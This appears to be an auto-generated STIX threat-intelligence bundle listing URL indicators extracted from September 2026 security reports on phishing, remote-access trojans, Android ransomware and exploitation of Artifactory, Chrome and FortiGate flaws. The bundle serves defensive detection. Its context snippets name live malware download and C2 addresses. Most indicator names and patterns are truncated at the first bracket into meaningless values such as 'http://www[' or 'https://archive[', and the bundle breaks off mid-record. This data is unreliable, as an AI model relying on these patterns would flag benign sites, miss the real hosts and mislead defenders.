{"type":"bundle","id":"bundle--472c6b7a-9d0b-4390-b44e-3718077204c7","objects":[{"type":"identity","spec_version":"2.1","id":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","created":"2026-09-16T07:00:23.356Z","modified":"2026-09-16T07:00:23.356Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--d6973abc-579d-47ac-a442-75b3a93a8fa5","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: [.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f0c2706-36dc-4abf-861a-1e4ff948141c","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: nder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankin","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c6e46fa-7940-4028-b6ef-eadc8c43a4d5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://aa.amazingshield[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent","pattern":"[url:value = 'http://aa.amazingshield[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81b8f567-2c6e-46d9-8231-d243f986e101","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://drelto[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain s","pattern":"[url:value = 'https://drelto[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8380db44-db8e-4499-8648-306288c5811c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://stryper[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sHelper\\docro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia R","pattern":"[url:value = 'https://stryper[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e27e8f0-e745-411c-9d9f-dfd70d1ff316","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://archive[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemorySca","pattern":"[url:value = 'https://archive[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e04e151-6873-475d-a3be-f8511cbd1bc4","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://connection[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage:","pattern":"[url:value = 'https://connection[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a81a6cfb-5a2b-40df-b334-4cd5e1f9b486","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://granderevolucao[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET P","pattern":"[url:value = 'https://granderevolucao[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b3430148-5288-4959-9384-16494a7cbd28","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://ia601808[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel","pattern":"[url:value = 'https://ia601808[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8eed71c9-c048-4e96-a4b4-891efba16295","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://volmira[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. The","pattern":"[url:value = 'https://volmira[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e480548a-983e-45a1-8c40-33245fd15d23","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://zaviro[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request wa","pattern":"[url:value = 'https://zaviro[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--592a929a-2592-4403-9bd9-2a6573f07c49","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://www[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not re","pattern":"[url:value = 'http://www[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23008fc1-55ab-4661-87b8-5a2c7ee55965","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://proof.gitprogram[","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: gleBamboo Phishing, exploit delivery, and C2 infrastructure hxxps://proof.gitprogram[.]com/a4/j8 URL JungleBamboo September 2 phishing URL servin","pattern":"[url:value = 'https://proof.gitprogram[']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dcfac08e-93a0-434e-a6f8-72c3668c3d3f","created":"2026-09-11T12:14:12.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://apimantax[","description":"Seen in \"New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims\" (Cyber Security News). Context: cted outbound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically r","pattern":"[url:value = 'https://apimantax[']","pattern_type":"stix","valid_from":"2026-09-11T12:14:12.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97fd41db-2c7e-4c03-b993-e17167082d03","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://3.88.162[","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second-stage payload download URL 2026-09-07","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43019288-cafd-4916-b757-e70089fccbd1","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://log.gitclone[","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: Actor IP exploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-420","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3916d928-e9cf-4b37-828a-715fe6710ebe","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://3.88.162[","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: ]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash /tmp/.z — 513a907b69edffc3cb77a4","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b2772dd-dd20-476b-9203-f449610e8a68","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://log.gitclone[","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: [.]88 , 137.184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Ha","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f905facf-f897-456d-84fe-b2f911d344a7","created":"2026-09-11T07:14:05.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://apimantax[","description":"Seen in \"Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files\" (GBHackers). Context: lution. Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and publ","pattern":"[url:value = 'https://apimantax[']","pattern_type":"stix","valid_from":"2026-09-11T07:14:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/mantax-otax-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df15f7ac-d149-4ca0-88d3-d520c1afe3d2","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://3.88.162[","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second load of payload after CVE-2026-42018/","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fb95664-f220-4de5-83fe-5c1cc9343fc2","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://log.gitclone[","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: loiting CVE-2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--47cd57a6-f17f-407d-a5c9-8d2f41824d9b","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://stro7121.blob.core.windows[","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: xe interpreter to download and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script","pattern":"[url:value = 'https://stro7121.blob.core.windows[']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a778f52-b307-436d-b4de-a1f5c1018077","created":"2026-09-10T08:06:02.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://167.148.195[","description":"Seen in \"Hackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks\" (Cyber Security News). Context: 172ec Brazilian financial campaign malware or tool hash URL hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Download location for SockTz versi","pattern":"[url:value = 'http://167.148.195[']","pattern_type":"stix","valid_from":"2026-09-10T08:06:02.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/gpt-powered-tools/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c3e2db01-f986-4e99-82a0-d489828f97a4","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://45.142.193[","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: ing followed by Base64 encoding using certutil Download URL hxxp://45.142.193[.]132:8000/lsa_collect.exe Download location for LSA bootkey","pattern":"[url:value = 'http://45.142.193[']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6ff6e4aa-7af0-4ccc-848d-52e117db1ef1","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://api-prod.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ad.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-prod.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evid","pattern":"[url:value = 'https://api-prod.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--30dde73e-84e9-48f9-b795-4b23b77a4bb8","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://download.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://download.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-","pattern":"[url:value = 'https://download.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6bf70553-6c10-4a13-b371-82a58d93559e","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://evidence.msbenefit[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: od.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evidence.msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki","pattern":"[url:value = 'https://evidence.msbenefit[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22a54004-346d-4d52-a453-e527cf2d2f36","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://project.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: n[.]com Hostname TA412 BlueMoon exploit page September 2026 hxxps://project.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://","pattern":"[url:value = 'https://project.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82a6d508-cebc-43ee-8148-93838185d5b8","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://recommendation-letter.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://recommendation-letter.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://","pattern":"[url:value = 'https://recommendation-letter.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9f70109-bf8a-4660-a96d-c930e6e907fe","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://zki0y83.msbenefit[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: .msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki0y83.msbenefit[.]com:443/feed URL Download URL August 2026 extension-manage","pattern":"[url:value = 'https://zki0y83.msbenefit[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10d4c76c-c365-4728-bcfc-3cce9e2466ab","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://kr[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: 2 endpoint for the reverse TCP proxy PowerShell payload URL hxxps://kr[.]cedar2glanz[.]ru/jewel[.]js Secondary PowerShell payload f","pattern":"[url:value = 'https://kr[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8393dc4b-ef9e-48f6-a657-6b7214870805","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://phys[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: for the verification.google branch PowerShell download URL hxxps://phys[.]stunned-amniotic[.]com/hub[.]log ZIP payload retrieved by","pattern":"[url:value = 'https://phys[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71c61f4a-fe02-42fa-84f0-c131a5c1c018","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://telegra[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: loader observed at the Ukrainian organization Dead-drop URL hxxps://telegra[.]ph/Functions-04-03 Public page used by the Amatera branch","pattern":"[url:value = 'https://telegra[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9bb1addd-6729-48de-8204-265620eea2a2","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://146[","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: s. The initial stager downloads a second-stage payload from hxxps://146[.]103[.]99[.]177:8443/0c5b76709523, decodes it, and XOR-decr","pattern":"[url:value = 'https://146[']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd2fd972-6ea1-44ea-a467-9c8bc51331dc","created":"2026-09-03T16:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://＜account-id＞.acemlnd[","description":"Seen in \"ASCII smuggling crosses over from AI prompt injection to phishing evasion\" (Microsoft Security Blog). Context: s do not point at the brand domain at all – they look like: hxxps://＜account-id＞.acemlnd[.]com/＜tracking-token＞ hxxps://＜brand-subdomain＞.activehoste","pattern":"[url:value = 'https://＜account-id＞.acemlnd[']","pattern_type":"stix","valid_from":"2026-09-03T16:00:00.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security 